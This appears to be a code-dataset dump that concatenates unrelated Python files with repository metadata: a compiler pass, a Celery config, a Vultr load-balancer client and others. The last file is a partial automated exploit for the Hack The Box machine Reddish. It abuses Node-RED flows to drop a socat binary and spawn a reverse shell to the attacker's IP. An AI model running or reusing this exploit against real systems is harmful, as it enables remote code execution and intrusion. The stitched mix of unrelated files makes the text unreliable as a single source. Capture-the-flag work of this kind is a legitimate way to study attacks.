text = await text_reader(content)
data = json.loads(text)
info.update(data)
return 204
app = Application(info={'name': 'Michael Caine'})
app.http_router.add({'GET'}, '/info', get_info)
app.http_router.add({'POST'}, '/info', set_info)
config = Config()
config.bind = ["0.0.0.0:9009"]
asyncio.run(serve(app, config))
| 27.351351
| 65
| 0.690711
| 0
| 0
| 0
| 0
| 0
| 0
| 583
| 0.576087
| 174
| 0.171937
|
620015da2fb2461bd1becafb3bfad88fa6ea66e6
| 567
|
py
|
Python
|
memory/build_memory.py
|
ngowilliam1/more-contrastive
|
50884c369145d19a39edabf56ecfdc02af1b42c4
|
[
"Apache-2.0"
] | 70
|
2020-12-04T06:44:57.000Z
|
2022-03-30T03:38:55.000Z
|
memory/build_memory.py
|
ngowilliam1/more-contrastive
|
50884c369145d19a39edabf56ecfdc02af1b42c4
|
[
"Apache-2.0"
] | 18
|
2020-12-31T03:57:35.000Z
|
2021-10-21T06:41:41.000Z
|
infomin/build_memory.py
|
frank-xwang/CLD
|
0852e5c3d0f0c28e85668b87b4fff20bd67e3efd
|
[
"MIT"
] | 6
|
2021-04-13T18:09:14.000Z
|
2021-12-14T11:18:23.000Z
|
from .mem_bank import RGBMem, CMCMem
from .mem_moco import RGBMoCo, CMCMoCo
def build_mem(opt, n_data):
if opt.mem == 'bank':
mem_func = RGBMem if opt.modal == 'RGB' else CMCMem
memory = mem_func(opt.feat_dim, n_data,
opt.nce_k, opt.nce_t, opt.nce_m)
elif opt.mem == 'moco':
mem_func = RGBMoCo if opt.modal == 'RGB' else CMCMoCo
memory = mem_func(opt.feat_dim, opt.nce_k, opt.nce_t)
else:
raise NotImplementedError(
'mem not suported: {}'.format(opt.mem))
return memory
| 31.5
| 61
| 0.611993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.077601
|
6200daab351d8a43f810d28196ac2f8c75e8b726
| 803
|
py
|
Python
|
Aves2/Aves2/celery.py
|
jd-aig/aves2
|
10aeb832feb94adf563f9795013c77bfd115b44e
|
[
"Apache-2.0"
] | 3
|
2020-09-24T01:36:02.000Z
|
2022-03-28T11:53:54.000Z
|
Aves2/Aves2/celery.py
|
jd-aig/aves2
|
10aeb832feb94adf563f9795013c77bfd115b44e
|
[
"Apache-2.0"
] | null | null | null |
Aves2/Aves2/celery.py
|
jd-aig/aves2
|
10aeb832feb94adf563f9795013c77bfd115b44e
|
[
"Apache-2.0"
] | 1
|
2020-12-08T05:14:23.000Z
|
2020-12-08T05:14:23.000Z
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
from celery.schedules import crontab
# from celery_once import QueueOnce
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Aves2.settings')
app = Celery('Aves2')
# Using a string here means the worker don't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
app.conf.timezone = 'Asia/Shanghai'
# Add periodic-tasks
app.conf.beat_schedule = {
}
| 27.689655
| 66
| 0.775841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 503
| 0.626401
|
62011193ee986970753cb1015967250f10e93794
| 14,374
|
py
|
Python
|
hwtHls/ssa/translation/fromAst/astToSsa.py
|
Nic30/hwtHls
|
1fac6ed128318e698d51e15e9871249ddf243e1c
|
[
"MIT"
] | 8
|
2018-09-25T03:28:11.000Z
|
2021-12-15T07:44:38.000Z
|
hwtHls/ssa/translation/fromAst/astToSsa.py
|
Nic30/hwtHls
|
1fac6ed128318e698d51e15e9871249ddf243e1c
|
[
"MIT"
] | 1
|
2020-12-21T10:56:44.000Z
|
2020-12-21T10:56:44.000Z
|
hwtHls/ssa/translation/fromAst/astToSsa.py
|
Nic30/hwtHls
|
1fac6ed128318e698d51e15e9871249ddf243e1c
|
[
"MIT"
] | 2
|
2018-09-25T03:28:18.000Z
|
2021-12-15T10:28:35.000Z
|
from typing import Union, List, Optional, Tuple, Set
from hwt.hdl.operator import Operator
from hwt.hdl.operatorDefs import AllOps
from hwt.hdl.portItem import HdlPortItem
from hwt.hdl.statements.assignmentContainer import HdlAssignmentContainer
from hwt.hdl.statements.codeBlockContainer import HdlStmCodeBlockContainer
from hwt.hdl.statements.ifContainter import IfContainer
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.rtlSignal import RtlSignal
from hwt.synthesizer.rtlLevel.signalUtils.exceptions import SignalDriverErr
from hwtHls.hlsStreamProc.statements import HlsStreamProcStm, HlsStreamProcWhile, \
HlsStreamProcWrite, HlsStreamProcRead, HlsStreamProcCodeBlock, \
HlsStreamProcIf, HlsStreamProcFor, HlsStreamProcContinue, HlsStreamProcBreak
from hwtHls.ssa.basicBlock import SsaBasicBlock
from hwtHls.ssa.context import SsaContext
from hwtHls.ssa.instr import SsaInstr, SsaInstrBranch
from hwtHls.ssa.translation.fromAst.memorySSAUpdater import MemorySSAUpdater
from hwtHls.ssa.value import SsaValue
AnyStm = Union[HdlAssignmentContainer, HlsStreamProcStm]
class SsaInstrBranchUnreachable(SsaInstrBranch):
def addTarget(self, cond:Optional[SsaValue], target:"SsaBasicBlock"):
pass
class SsaBasicBlockUnreachable(SsaBasicBlock):
def __init__(self, ctx: SsaContext, label:str):
SsaBasicBlock.__init__(self, ctx, label)
self.successors = SsaInstrBranchUnreachable(self)
class AstToSsa():
"""
* Matthias Braun, Sebastian Buchwald, Sebastian Hack, Roland Leißa, Christoph Mallon, and Andreas Zwinkau. 2013.
Simple and efficient construction of static single assignment form.
In Proceedings of the 22nd international conference on Compiler Construction (CC'13).
Springer-Verlag, Berlin, Heidelberg, 102–122. DOI:https://doi.org/10.1007/978-3-642-37051-9_6
* avoids computation of dominance or iterated DF
* works directly on AST (avoids CFG)
:see: https://github.com/lohner/FormalSSA
:note: new statements do generate a new block if this statement is not a loop the bloc is sealed.
If statement is loop the first block is sealed once all jumps from loop end are resolved.
Once the block is sealed the arguments for all phi functions is resolved recursively
and redundant phis are reduced.
:see: http://dev.stephendiehl.com/numpile/
:ivar start: basic block where the program begins
:ivar m_ssa_u: object which is used to track variable usage a to construct SsaPhi for SSA normal form
:ivar _continue_target: list of basic blocks where code should jump on continue statement
:ivar _break_target: list of basic blocks where code should jump on break statement
:ivar _loop_stack: list of loop where the AST visitor actually is to resolve
the continue/break and loop association. The record is a tuple (loop statement, entry block, list of blocks ending with break).
The blocks ending with break will have its breanch destination assigned after the loop is processed (in loop parsing fn.).
"""
def __init__(self, ssaCtx: SsaContext, startBlockName:str, original_code_for_debug: Optional[HlsStreamProcCodeBlock]):
self.ssaCtx = ssaCtx
self.start = SsaBasicBlock(ssaCtx, startBlockName)
self.m_ssa_u = MemorySSAUpdater(self._onBlockReduce, self.visit_expr)
# all predecesors known (because this is an entry point)
self._onAllPredecsKnown(self.start)
self._continue_target: List[SsaBasicBlock] = []
self._break_target: List[SsaBasicBlock] = []
self.original_code_for_debug = original_code_for_debug
self._loop_stack: List[Tuple[HlsStreamProcWhile, SsaBasicBlock, List[SsaBasicBlock]]] = []
def _onBlockReduce(self, block: SsaBasicBlock, replacement: SsaBasicBlock):
if block is self.start:
self.start = replacement
@staticmethod
def _addNewTargetBb(predecessor: SsaBasicBlock, cond: Optional[RtlSignal], label: str, origin) -> SsaBasicBlock:
new_block = SsaBasicBlock(predecessor.ctx, label)
if origin is not None:
new_block.origins.append(origin)
predecessor.successors.addTarget(cond, new_block)
return new_block
def _onAllPredecsKnown(self, block: SsaBasicBlock):
self.m_ssa_u.sealBlock(block)
def visit_top_CodeBlock(self, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
block = self.visit_CodeBlock(self.start, obj)
self._onAllPredecsKnown(block)
return block
def visit_CodeBlock(self, block: SsaBasicBlock, obj: HdlStmCodeBlockContainer) -> SsaBasicBlock:
return self.visit_CodeBlock_list(block, obj.statements)
def visit_CodeBlock_list(self, block: SsaBasicBlock, obj: List[AnyStm]) -> SsaBasicBlock:
for o in obj:
if isinstance(o, HdlAssignmentContainer):
block = self.visit_Assignment(block, o)
elif isinstance(o, HlsStreamProcWrite):
block = self.visit_Write(block, o)
elif isinstance(o, HlsStreamProcWhile):
block = self.visit_While(block, o)
elif isinstance(o, HlsStreamProcFor):
block = self.visit_For(block, o)
elif isinstance(o, (HlsStreamProcIf, IfContainer)):
block = self.visit_If(block, o)
elif isinstance(o, HlsStreamProcRead):
block, _ = self.visit_expr(block, o)
elif isinstance(o, HlsStreamProcBreak):
block = self.visit_Break(block, o)
elif isinstance(o, HlsStreamProcContinue):
block = self.visit_Coninue(block, o)
else:
raise NotImplementedError(o)
return block
def visit_expr(self, block: SsaBasicBlock, var: Union[RtlSignal, HValue]) -> Tuple[SsaBasicBlock, Union[SsaValue, HValue]]:
if isinstance(var, RtlSignal):
try:
op = var.singleDriver()
except SignalDriverErr:
op = None
if op is None or not isinstance(op, Operator):
if isinstance(op, HdlPortItem):
raise NotImplementedError(op)
elif isinstance(op, HlsStreamProcRead):
if op.block is None:
block.appendInstruction(op)
# HlsStreamProcRead is a SsaValue and thus represents "variable"
self.m_ssa_u.writeVariable(var, (), block, op)
return block, op
elif isinstance(op, (HlsStreamProcBreak, HlsStreamProcContinue)):
raise NotImplementedError()
else:
return block, self.m_ssa_u.readVariable(var, block)
if op.operator in (AllOps.BitsAsVec, AllOps.BitsAsUnsigned) and not var._dtype.signed:
# skip implicit conversions
assert len(op.operands) == 1
return self.visit_expr(block, op.operands[0])
ops = []
for o in op.operands:
block, _o = self.visit_expr(block, o)
ops.append(_o)
self.m_ssa_u.writeVariable(var, (), block, tuple(ops))
var = SsaInstr(block.ctx, var._dtype, op.operator, ops, origin=var)
block.appendInstruction(var)
# we know for sure that this in in this block that is why we do not need to use readVariable
return block, var
elif isinstance(var, HValue):
return block, var
else:
if isinstance(var, HlsStreamProcRead):
if var.block is None:
block.appendInstruction(var)
# HlsStreamProcRead is a SsaValue and thus represents "variable"
self.m_ssa_u.writeVariable(var._sig, (), block, var)
var = var._sig
return block, self.m_ssa_u.readVariable(var, block)
def visit_For(self, block: SsaBasicBlock, o: HlsStreamProcFor) -> SsaBasicBlock:
block = self.visit_CodeBlock_list(block, o.init)
return self.visit_While(block, HlsStreamProcWhile(o.parent, o.cond, o.body + o.step))
def visit_While(self, block: SsaBasicBlock, o: HlsStreamProcWhile) -> SsaBasicBlock:
if isinstance(o.cond, HValue):
if o.cond:
# while True
cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
self._loop_stack.append((o, cond_block, []))
body_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_wh", o)
self._onAllPredecsKnown(body_block)
body_block = self.visit_CodeBlock_list(body_block, o.body)
body_block.successors.addTarget(None, cond_block)
self._onAllPredecsKnown(cond_block)
_o, _, breaks = self._loop_stack.pop()
assert _o is o, (_o, o, "Must be record of this loop")
if breaks:
end_block = SsaBasicBlock(block.ctx, f"{block.label:s}_whEnd")
for b in breaks:
b: SsaBasicBlock
b.successors.addTarget(None, end_block)
else:
end_block = SsaBasicBlockUnreachable(block.ctx, f"{block.label:s}_whUnreachable")
self._onAllPredecsKnown(end_block)
else:
# while False
end_block = block
else:
#
cond_block_orig = self._addNewTargetBb(block, None, f"{block.label:s}_whC", o)
c = o.cond
if c._dtype.bit_length() > 1:
c = c != 0
else:
c = c._isOn()
cond_block, c = self.visit_expr(cond_block_orig, c)
cond_block.origins.append(o)
self._loop_stack.append((o, cond_block, []))
body_block = self._addNewTargetBb(cond_block, c, f"{block.label:s}_wh", o)
self._onAllPredecsKnown(body_block)
end_block = self._addNewTargetBb(cond_block, None, f"{block.label:s}_whE", o)
body_block = self.visit_CodeBlock_list(body_block, o.body)
body_block.successors.addTarget(None, cond_block)
self._onAllPredecsKnown(cond_block_orig)
_o, _, breaks = self._loop_stack.pop()
assert _o is o, (_o, o, "Must be record of this loop")
if breaks:
for b in breaks:
b: SsaBasicBlock
b.successors.addTarget(None, end_block)
self._onAllPredecsKnown(end_block)
return end_block
def visit_Continue(self, block: SsaBasicBlock, o: HlsStreamProcContinue) -> SsaBasicBlock:
assert self._loop_stack, (o, "Must be in loop")
_, loop_entry, _ = self._loop_stack[-1]
block.successors.addTarget(None, loop_entry)
return self._make_Unreachable(block.ctx, f"{block.label:s}_conUnreachable")
def _make_Unreachable(self, ctx:SsaContext, label:str):
end_block = SsaBasicBlockUnreachable(ctx, label)
self._onAllPredecsKnown(end_block)
return end_block
def visit_Break(self, block: SsaBasicBlock, o: HlsStreamProcContinue) -> SsaBasicBlock:
assert self._loop_stack, (o, "Must be in loop")
_, _, break_blocks = self._loop_stack[-1]
break_blocks.append(block)
return self._make_Unreachable(block.ctx, f"{block.label:s}_breUnreachable")
def visit_If_branch(self, origin: IfContainer, label: str, cond_block: SsaBasicBlock,
end_if_block: SsaBasicBlock, cond: Optional[SsaValue], caseStatements: list):
if caseStatements:
# new top block for the branch
block = self._addNewTargetBb(cond_block, cond, label, origin)
self._onAllPredecsKnown(block)
# load body of the branch
block = self.visit_CodeBlock_list(block, caseStatements)
# add jump from the end of the branch to end of if-then-else
block.successors.addTarget(None, end_if_block)
# now nothing can jump on start or end of the branch, end_if_block will be only successor
else:
cond_block.successors.addTarget(cond, end_if_block)
def visit_If(self, block: SsaBasicBlock, o: HlsStreamProcIf) -> SsaBasicBlock:
cond_block = self._addNewTargetBb(block, None, f"{block.label:s}_IfC", o)
self._onAllPredecsKnown(cond_block)
cond_block, cond = self.visit_expr(cond_block, o.cond)
end_if_block = SsaBasicBlock(self.ssaCtx, f"{block.label:s}_IfE")
self.visit_If_branch(o, f"{block.label:s}_If", cond_block, end_if_block, cond, o.ifTrue)
for i, (c, stms) in enumerate(o.elIfs):
cond_block, cond = self.visit_expr(cond_block, c)
self.visit_If_branch(o, f"{block.label:s}_Elif{i:d}", cond_block, end_if_block, cond, stms)
self.visit_If_branch(o, f"{block.label:s}_Else", cond_block, end_if_block, None, o.ifFalse)
self._onAllPredecsKnown(end_if_block)
return end_if_block
def visit_Assignment(self, block: SsaBasicBlock, o: HdlAssignmentContainer) -> SsaBasicBlock:
block, src = self.visit_expr(block, o.src)
block.origins.append(o)
# this may result in:
# * store instruction
# * just the registration of the varialbe for the symbol
# * only a segment in bit vector can be assigned, this result in the assignment of the concatenation of previous and new value
self.m_ssa_u.writeVariable(o.dst, o.indexes, block, src)
# ld = SsaInstr(o.dst, src)
# block.appendInstruction(ld)
# if isinstance(src, SsaValue):
# src.users.append(ld)
return block
def visit_Write(self, block: SsaBasicBlock, o: HlsStreamProcWrite) -> SsaBasicBlock:
block, src = self.visit_expr(block, o.getSrc())
o.operands = (src,)
block.appendInstruction(o)
block.origins.append(o)
if isinstance(src, SsaValue):
src.users.append(o)
return block
def finalize(self):
assert not self.m_ssa_u.incompletePhis, self.m_ssa_u.incompletePhis
| 45.487342
| 136
| 0.64881
| 13,273
| 0.923211
| 0
| 0
| 347
| 0.024136
| 0
| 0
| 2,937
| 0.204285
|
6202a8816bac81aec1be652ea835f294593e8695
| 12,009
|
py
|
Python
|
pyvultr/v2/load_balance.py
|
luxiaba/pyvultr
|
29b45d036f728c15d91c4b590bd893b9c7f609ae
|
[
"MIT"
] | 4
|
2021-12-01T18:06:18.000Z
|
2022-01-22T12:39:52.000Z
|
pyvultr/v2/load_balance.py
|
luxiaba/pyvultr
|
29b45d036f728c15d91c4b590bd893b9c7f609ae
|
[
"MIT"
] | 1
|
2021-12-19T14:05:42.000Z
|
2021-12-19T14:05:42.000Z
|
pyvultr/v2/load_balance.py
|
luxiaba/pyvultr
|
29b45d036f728c15d91c4b590bd893b9c7f609ae
|
[
"MIT"
] | 1
|
2021-12-20T04:54:08.000Z
|
2021-12-20T04:54:08.000Z
|
from dataclasses import dataclass
from functools import partial
from typing import Dict, List, Optional
from urllib.parse import urljoin
from pyvultr.utils import BaseDataclass, VultrPagination, get_only_value, merge_args
from .base import BaseVultrV2, command
from .enums import LoadBalanceAlgorithm, LoadBalanceProtocol
@dataclass
class LoadBalanceGenericInfo(BaseDataclass):
# If true, this will redirect all HTTP traffic to HTTPS.
# You must have an HTTPS rule and SSL certificate installed on the load balancer to enable this option.
ssl_redirect: bool
sticky_sessions: Dict # Array of sticky session cookies({'cookie_name': 'xxx'}).
# ID of the private network you wish to use.
# If private_network is omitted it will default to the public network.
private_network: str
# The balancing algorithm, see `enums.LoadBalanceAlgorithm` for possible values.
balancing_algorithm: str = LoadBalanceAlgorithm.ROUND_ROBIN.value
# If true, you must configure backend nodes to accept Proxy protocol. default is false.
proxy_protocol: bool = False
@dataclass
class LoadBalanceHealthCheck(BaseDataclass):
protocol: str # The protocol to use for health checks, see `enums.LoadBalanceProtocol` for possible values.
port: int # The port to use for health checks.
path: str # HTTP Path to check. Only applies if Protocol is HTTP or HTTPS.
check_interval: int # Interval between health checks.
response_timeout: int # Timeout before health check fails.
unhealthy_threshold: int # Number times a check must fail before becoming unhealthy.
healthy_threshold: int # Number of times a check must succeed before returning to healthy status.
@dataclass
class LoadBalanceForwardRule(BaseDataclass):
id: str # A unique ID for the forwarding rule.
# The protocol on the Load Balancer to forward to the backend.
# see `enums.LoadBalanceProtocol` for possible values.
frontend_protocol: str
frontend_port: int # The port number on the Load Balancer to forward to the backend.
# The protocol destination on the backend server.
# see `enums.LoadBalanceProtocol` for possible values.
backend_protocol: str
backend_port: int # The port number destination on the backend server.
@dataclass
class LoadBalanceFirewallRule(BaseDataclass):
id: str # A unique ID for the firewall rule.
port: int # Port for this rule.
# If the source string is given a value of "cloudflare" then cloudflare IPs will be supplied.
# Otherwise enter a IP address with subnet size that you wish to permit through the firewall.
# | Value | Description
# | ---------------- | -----------
# | "192.168.1.1/16" | Ip address with a subnet size.
# | "cloudflare" | Allow all of Cloudflare's IP space through the firewall
source: str
ip_type: str # The type of IP rule, see `enums.IPType` for possible values.
@dataclass
class LoadBalance(BaseDataclass):
id: str # A unique ID for the Load Balancer.
date_created: str # Date this Load Balancer was created.
# The Region id where the instance is located, check `RegionAPI.list` and `RegionItem.id` for available regions.
region: str
label: str # The user-supplied label for this load-balancer.
status: str # The current status, see `enums.LoadBalanceStatus` for possible values.
ipv4: str # The IPv4 address of this Load Balancer.
ipv6: str # The IPv6 address of this Load Balancer.
generic_info: LoadBalanceGenericInfo # An object containing additional options.
health_check: LoadBalanceHealthCheck
has_ssl: bool # Indicates if this Load Balancer has an SSL certificate installed.
forwarding_rules: List[LoadBalanceForwardRule] # An array of forwarding rule objects.
instances: List[str] # Array of Instance ids attached to this Load Balancer.
firewall_rules: List[LoadBalanceFirewallRule] # An array of firewall rule objects.
class LoadBalanceAPI(BaseVultrV2):
"""Vultr LoanBalance API.
Reference: https://www.vultr.com/api/#tag/load-balancer
Load Balancers sit in front of your application and distribute incoming traffic across multiple Instances.
When you control the load balancer via the API, you can inspect the results in the customer portal.
Attributes:
api_key: Vultr API key, we get it from env variable `$VULTR_API_KEY` if not provided.
"""
def __init__(self, api_key: Optional[str] = None):
super().__init__(api_key)
@property
def base_url(self):
"""Get base url for all API in this section."""
return urljoin(super().base_url, "load-balancers")
@command
def list(self, per_page: int = None, cursor: str = None, capacity: int = None) -> VultrPagination[LoadBalance]:
"""List the Load Balancers in your account.
Args:
per_page: Number of items requested per page. Default is 100 and Max is 500.
cursor: Cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceItem], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalance]: A list-like object of `LoadBalanceItem` object.
"""
return VultrPagination[LoadBalance](
fetcher=self._get,
cursor=cursor,
page_size=per_page,
return_type=LoadBalance,
capacity=capacity,
)
@command
def create(self, region: str, **kwargs) -> LoadBalance:
"""Create a new Load Balancer in a particular `region`.
Args:
region: The Region id to create this Load Balancer.
**kwargs: New LoanBalance parameters.
Returns:
LoadBalance: The LoadBalanceItem object.
"""
_fixed_kwargs = {"region": region}
resp = self._post(json=merge_args(kwargs, _fixed_kwargs))
return LoadBalance.from_dict(get_only_value(resp))
@command
def get(self, load_balancer_id: str) -> LoadBalance:
"""Get information for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
Returns:
LoadBalance: The LoadBalanceItem object.
"""
resp = self._get(f"/{load_balancer_id}")
return LoadBalance.from_dict(get_only_value(resp))
@command
def update(self, load_balancer_id: str, **kwargs):
"""Update information for a Load Balancer.
All attributes are optional. If not set, the attributes will retain their original values.
Args:
load_balancer_id: The Loan Balance id.
**kwargs: Updated LoanBalance parameters.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._patch(f"/{load_balancer_id}", json=kwargs)
@command
def delete(self, load_balancer_id: str):
"""Delete a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}")
@command
def list_forwarding_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceForwardRule]:
"""List the forwarding rules for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceForwardRule], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalanceForwardRule]: A list-like object of `LoadBalanceForwardRule` object.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/forwarding-rules")
return VultrPagination[LoadBalanceForwardRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceForwardRule,
capacity=capacity,
)
@command
def create_forwarding_rule(
self,
load_balancer_id: str,
frontend_protocol: LoadBalanceProtocol,
frontend_port: int,
backend_protocol: LoadBalanceProtocol,
backend_port: int,
) -> LoadBalanceForwardRule:
"""Create a new forwarding rule for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
frontend_protocol: The protocol on the Load Balancer to forward to the backend.
frontend_port: The port number on the Load Balancer to forward to the backend.
backend_protocol: The protocol destination on the backend server.
backend_port: The port number destination on the backend server.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
_json = {
"frontend_protocol": frontend_protocol.value,
"frontend_port": frontend_port,
"backend_protocol": backend_protocol.value,
"backend_port": backend_port,
}
resp = self._post(f"/{load_balancer_id}/forwarding-rules", json=_json)
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def get_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceForwardRule:
"""Get information for a Forwarding Rule on a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
resp = self._get(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def delete_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str):
"""Delete a Forwarding Rule on a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
@command
def list_firewall_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceFirewallRule]:
"""List the firewall rules for a Load Balancer.
Args:
load_balancer_id:
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceFirewallRule], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalanceFirewallRule]: A list-like object of `LoadBalanceFirewallRule` object.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/firewall-rules")
return VultrPagination[LoadBalanceFirewallRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceFirewallRule,
capacity=capacity,
)
@command
def get_firewall_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceFirewallRule:
"""Get a firewall rule for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The firewall rule id.
Returns:
LoadBalanceFirewallRule: A `LoadBalanceFirewallRule` object.
"""
resp = self._get(f"/{load_balancer_id}/firewall-rules/{forwarding_rule_id}")
return LoadBalanceFirewallRule.from_dict(get_only_value(resp))
| 39.117264
| 118
| 0.670081
| 11,612
| 0.966941
| 0
| 0
| 11,045
| 0.919727
| 0
| 0
| 7,046
| 0.586727
|
62034dcbe266726fc371d74a18776dc2103cd7d1
| 12,848
|
py
|
Python
|
hacking/HTB/Reddish/autopwn_reddish.py
|
Qazeer/code-snippets
|
6b15afb66312cbcf7c29f9ea32933ad0cbf65154
|
[
"Unlicense"
] | 219
|
2017-12-12T20:05:37.000Z
|
2022-03-27T06:08:08.000Z
|
hacking/HTB/Reddish/autopwn_reddish.py
|
FDlucifer/code-snippets
|
2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba
|
[
"Unlicense"
] | 3
|
2018-11-10T13:33:42.000Z
|
2020-10-21T13:53:00.000Z
|
hacking/HTB/Reddish/autopwn_reddish.py
|
FDlucifer/code-snippets
|
2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba
|
[
"Unlicense"
] | 108
|
2017-12-17T18:17:14.000Z
|
2022-03-15T13:24:44.000Z
|
#!/usr/bin/env python2
# Author: Alamot
import json
import time
import uuid
import fcntl
import base64
import urllib
import random
import requests
from pwn import *
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode())
)[20:24])
# context.log_level = 'debug'
LHOST = get_ip_address('tun0')
LPORT1 = "60000"
LPORT2 = str(random.randint(60003, 62535))
LPORT3 = str(random.randint(62535, 65535))
LPORT4 = "60001"
UUIDNAME = str(uuid.uuid4())[:8]
SOCAT_SRCPATH = "socat"
SOCAT_DSTPATH = "/var/tmp/socat" + UUIDNAME
SUBASH_PATH = "/var/tmp/" + UUIDNAME
CRONPL_PATH = "/tmp/" + UUIDNAME
def send_payloads():
session = requests.Session()
# Get id
p1 = log.progress("Getting our id")
headers = {"User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Connection":"close","Accept-Language":"en","Accept":"*/*"}
try:
response = session.post("http://10.10.10.94:1880/", headers=headers)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
else:
uid = json_data = json.loads(response.text)["id"].strip()
p1.success("OK (id = " + uid + ")")
except requests.exceptions.RequestException as e:
p1.failure(str(e))
sys.exit()
# Load flows
p2 = log.progress("Loading node-red flows")
with open(SOCAT_SRCPATH, 'r') as f:
b64upload = base64.b64encode(f.read())
rawBody = "{\"flows\":[{\"id\":\"e97f052f.2f3d48\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"6c08c84b.d9c578\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"node -e '(function(){ var cp = require(\\\"child_process\\\"), sh = cp.spawn(\\\"/bin/sh\\\", [\\\"-c\\\", \\\"cat " + SOCAT_DSTPATH + ".b64 | base64 -d > " +SOCAT_DSTPATH + " && chmod +x " + SOCAT_DSTPATH + " && " + SOCAT_DSTPATH + " exec:/bin/bash,pty,rawer,echo=0,stderr,setsid,sigint tcp:" + LHOST + ":" + LPORT1 + "\\\"]); return /a/; })();'\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":151,\"y\":88,\"wires\":[[\"d27da06a.44a1a\"]]},{\"id\":\"d27da06a.44a1a\",\"type\":\"exec\",\"z\":\"e97f052f.2f3d48\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":310,\"y\":80,\"wires\":[[],[],[]]},{\"id\":\"fae51292.d8e68\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"" + b64upload +"\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":113,\"y\":260,\"wires\":[[\"7e1e7cb5.664234\"]]},{\"id\":\"7e1e7cb5.664234\",\"type\":\"file\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"filename\":\"" + SOCAT_DSTPATH +".b64\",\"appendNewline\":false,\"createDir\":false,\"overwriteFile\":\"true\",\"x\":320,\"y\":260,\"wires\":[]}]}"
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/flows","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1","Content-Type":"application/json; charset=utf-8","Node-RED-Deployment-Type":"full"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/flows", data=rawBody, headers=headers)
if response.status_code != 200:
p2.failure("Status "+str(response.status_code))
sys.exit()
else:
p2.success("OK")
except requests.exceptions.RequestException as e:
p2.failure(str(e))
sys.exit()
# Inject base64-encoded socat
p3 = log.progress("Injecting base64-encoded socat")
